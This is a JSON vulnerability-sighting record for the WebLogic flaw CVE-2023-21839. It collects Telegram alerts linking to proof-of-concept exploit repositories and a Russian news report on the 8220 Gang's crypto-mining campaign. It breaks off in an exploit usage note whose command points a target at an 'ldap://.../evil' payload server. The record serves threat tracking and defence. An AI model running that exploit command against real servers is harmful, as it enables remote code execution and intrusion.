{"vulnerability": "CVE-2023-21839", "sightings": [{"uuid": "9a3fd3bf-0261-49e6-a2e3-6918e66dbe0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "bf327197-9f6b-4a45-8007-0c388e49997b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971807", "content": "", "creation_timestamp": "2024-12-24T20:34:18.253979Z"}, {"uuid": "a0c3e392-8fff-48a3-a771-1f17c2d5baa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://bsky.app/profile/gothburz.bsky.social/post/3leztqnzcuc2n", "content": "", "creation_timestamp": "2025-01-06T00:08:24.094017Z"}, {"uuid": "b0b19f95-9fb6-4143-9150-b591838054b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "8fc6a537-dd5d-4e1e-8b23-ab5aa3a46de1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:50.000000Z"}, {"uuid": "c2010d0d-66fd-437f-8ed2-0743ee2a1f57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/javascript/cves/2023/CVE-2023-21839.yaml", "content": "", "creation_timestamp": "2025-10-10T10:54:11.000000Z"}, {"uuid": "1613693e-9678-4f4b-940f-cd0a285a79a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:41.000000Z"}, {"uuid": "b10147b2-6e3d-4a18-9280-421572534103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:00.000000Z"}, {"uuid": "e51defab-0901-423f-ba48-d8edc3961efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2023-21839", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3m46a4woycl2u", "content": "", "creation_timestamp": "2025-10-27T10:40:07.438545Z"}, {"uuid": "3140e43f-cd34-4542-b83c-3cfe08c767ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3m2zlw2o6722q", "content": "", "creation_timestamp": "2025-10-12T21:02:32.516291Z"}, {"uuid": "c5f70c97-0166-4847-bc5c-fcd87d78993e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb", "content": "", "creation_timestamp": "2023-06-09T19:18:50.000000Z"}, {"uuid": "f7211aef-7059-4c37-b185-778686a170a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6054", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aA testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432\nURL\uff1ahttps://github.com/Romanc9/Gui-poc-test\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-12-03T13:47:08.000000Z"}, {"uuid": "17434e60-2c46-422c-8694-105cba6abf72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3716", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21839 exp\nURL\uff1ahttps://github.com/fakenews2025/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-01-29T15:43:57.000000Z"}, {"uuid": "dd21e8f8-1170-4a5e-b0e6-b7fd36688a9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/628ebdf4-b837-4278-a32e-ed554a315e56", "content": "", "creation_timestamp": "2026-02-02T12:27:00.307455Z"}, {"uuid": "7451fa57-2375-491a-80ce-f33e7e99283f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3923", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21839\u5de5\u5177\nURL\uff1ahttps://github.com/Firebasky/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-03-11T08:31:12.000000Z"}, {"uuid": "a3a87f74-1a7d-46fd-a33b-fc1b82d5a6ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3830", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/4ra1n/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-02-25T16:58:59.000000Z"}, {"uuid": "265690f7-afff-4e3e-9f6b-66b8e29d030d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4229", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21839 Python\u7248\u672c\nURL\uff1ahttps://github.com/houqe/POC_CVE-2023-21839\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-21T08:09:35.000000Z"}, {"uuid": "c9b5bd5c-acdb-4d1e-b6bf-6573eeaa1927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/17019", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/juniorinter/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-05T11:25:46.000000Z"}, {"uuid": "602f0f55-cabb-4be4-b3b0-45e7622611a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/15217", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/outgoingcon/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-02-24T10:29:24.000000Z"}, {"uuid": "86211bb1-ca01-4272-95a2-4034e8eb2972", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/16635", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/thishistorian/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-03T14:11:21.000000Z"}, {"uuid": "bd09c8b0-6f6a-4df7-b4b8-a7e411b2aa5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "https://t.me/itsec_news/4519", "content": "\u200b\u26a1\ufe0f\u041c\u0430\u0439\u043d\u0435\u0440\u044b-\u043d\u0435\u0432\u0438\u0434\u0438\u043c\u043a\u0438: 8220 Gang \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 WireGuard \u0434\u043b\u044f \u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0430\u0442\u0430\u043a\n\n\ud83d\udcac\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0438 \u043d\u043e\u0432\u044b\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043c\u0430\u0439\u043d\u0438\u043d\u0433\u0443 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b (\u043a\u0440\u0438\u043f\u0442\u043e\u0434\u0436\u0435\u043a\u0438\u043d\u0433\u0443), \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u043e\u0439 8220 Gang, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Oracle WebLogic Server.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0438\u0437 Trend Micro \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0432 \u0441\u0432\u043e\u0451\u043c \u0441\u0432\u0435\u0436\u0435\u043c \u043e\u0442\u0447\u0451\u0442\u0435, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0431\u0435\u0441\u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a Reflective DLL Loading. \u042d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u043c\u0443 \u041f\u041e \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432 \u043f\u0430\u043c\u044f\u0442\u0438, \u0438\u0437\u0431\u0435\u0433\u0430\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u043d\u0430 \u0434\u0438\u0441\u043a\u0435.\n8220 Gang, \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Water Sigbin, \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Oracle WebLogic Server, \u0432\u043a\u043b\u044e\u0447\u0430\u044f CVE-2017-3506, CVE-2017-10271 \u0438 CVE-2023-21839. \u0423\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u0430.\n\n\u041f\u043e\u0441\u043b\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 PowerShell, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043f\u0435\u0440\u0432\u044b\u0439 \u044d\u0442\u0430\u043f \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 (\u00abwireguard2-3.exe\u00bb). \u042d\u0442\u043e\u0442 \u0444\u0430\u0439\u043b \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 WireGuard VPN, \u043d\u043e \u043d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0434\u0440\u0443\u0433\u043e\u0439 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b (\u00abcvtres.exe\u00bb) \u043f\u0440\u044f\u043c\u043e \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e DLL (\u00abZxpus.dll\u00bb).\n\n\u042d\u0442\u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0441\u043b\u0443\u0436\u0438\u0442 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 PureCrypter (\u00abTixrgtluffu.dll\u00bb), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0437\u0430\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0434\u043b\u044f \u0430\u043a\u0442\u0438\u0432\u0430\u0446\u0438\u0438 \u043c\u0430\u0439\u043d\u0435\u0440\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432 \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u0430 Microsoft Defender.\n\n\u041a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435\u043c, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u043c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f XMRig, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u0442 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043c\u0430\u0439\u043d\u0435\u0440 \u0441 \u0434\u043e\u043c\u0435\u043d\u0430, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438. \u0421\u0430\u043c \u043c\u0430\u0439\u043d\u0435\u0440 \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0439 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0444\u0430\u0439\u043b Microsoft (\u00abAddinProcess.exe\u00bb).\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u0435\u0442\u043e\u0434 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u043e \u0441\u043a\u0440\u044b\u0432\u0430\u0442\u044c\u0441\u044f \u043e\u0442 \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u0449\u0438\u0442\u044b. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0431\u0435\u0441\u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0442\u0435\u0445\u043d\u0438\u043a \u0437\u0430\u0442\u0440\u0443\u0434\u043d\u044f\u0435\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e.\n\n\u041f\u043e\u043c\u0438\u043c\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 Oracle WebLogic Server, \u0433\u0440\u0443\u043f\u043f\u0430 8220 Gang \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0435\u0439 \u0434\u0440\u0443\u0433\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u044f \u0441\u0432\u043e\u0438\u0445 \u0446\u0435\u043b\u0435\u0439. \u0418\u0445 \u043c\u0435\u0442\u043e\u0434\u044b \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0441\u0442\u0432\u0443\u044e\u0442\u0441\u044f, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0430\u0442\u0430\u043a\u0438 \u0433\u0440\u0443\u043f\u043f\u044b \u0432\u0441\u0451 \u0431\u043e\u043b\u0435\u0435 \u0438\u0437\u043e\u0449\u0440\u0435\u043d\u043d\u044b\u043c\u0438 \u0438 \u043e\u043f\u0430\u0441\u043d\u044b\u043c\u0438.\n\n\u041e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u043c\u0438\u0448\u0435\u043d\u044c\u044e \u044d\u0442\u0438\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u0438 \u0441\u0442\u0430\u0440\u044b\u043c\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0438\u0445 \u043b\u0451\u0433\u043a\u043e\u0439 \u0434\u043e\u0431\u044b\u0447\u0435\u0439 \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432. \u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u0441\u0432\u043e\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0430\u0442\u0430\u043a.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2024-06-28T19:48:04.000000Z"}, {"uuid": "fb6015e1-073d-4e29-9528-131ce09749aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6572", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-20931, this is the bypass of the patch of CVE-2023-21839\nURL\uff1ahttps://github.com/dinosn/CVE-2024-20931\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-06T15:13:31.000000Z"}, {"uuid": "ca991a44-406a-41f5-93ca-ccd40200dcf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "Telegram/aZv6MAkPy0Zg9M5eswpBgPGNLziNK_Z6couQG8utTPmkEhE", "content": "", "creation_timestamp": "2023-02-26T12:28:03.000000Z"}, {"uuid": "16c0e3b0-4494-4204-b6e5-dfe01d7d4b12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/22033", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/illegalbrea/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-21T12:07:20.000000Z"}, {"uuid": "60c644b9-bd3a-48fa-9c5f-23de1182a9f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/19048", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/lovingpot/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-15T12:38:06.000000Z"}, {"uuid": "7d185609-5846-4556-9259-2e00f645d3ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2754", "content": "Weblogic CVE-2023-21839 RCE\n\nLinux/Mac OS\n cmd\ngo build -o CVE-2023-21839\n./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil\n\nWindows\n cmd\ngo build -o 